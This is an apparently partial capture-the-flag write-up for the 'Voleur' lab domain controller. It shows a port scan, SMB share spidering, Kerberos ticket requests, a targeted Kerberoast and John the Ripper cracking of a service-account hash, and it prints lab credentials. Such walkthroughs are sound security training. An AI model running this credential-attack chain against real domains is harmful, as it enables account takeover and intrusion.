Host : voleur.htb / dc.voleur.htb
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-07-12 23:13:38Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
2222/tcp open ssh syn-ack ttl 127 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
All first tries on these ports and the given credentials won't work so we going to analyze using other method:
nxc smb dc.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -M spider_plus -k
Note: the right domain voleur.htb doesn't respond to any of our queries, that's why we use the DC now with spider_plus option.
Tool reference: nxc documentation
impacket-getTGT voleur.htb/ryan.naylor:'HollowOct31Nyt' -dc-ip 10.10.11.76
export KRB5CCNAME=ryan.naylor.ccache
impacket-smbclient -k dc.voleur.htb
Get the .xlsx file, crack it and get access to its content.
impacket-getTGT voleur.htb/svc_ldap:'M1XyC9pW7qT5Vn' -dc-ip 10.10.11.76
export KRB5CCNAME=svc_ldap.ccache
python3 targetedKerberoast.py -k --dc-host dc.voleur.htb -u svc_ldap -d voleur.htb
The script output included hashes for lacey.miller and svc_winrm. The svc_winrm hash was cracked using John the Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt svc_winrm_hashes.txt
User: svc_winrm
Pass: AFireInsidedeOzarctica980219afi (?)
As the machine is still not retired, we'll stop here for today. Updates will come soon.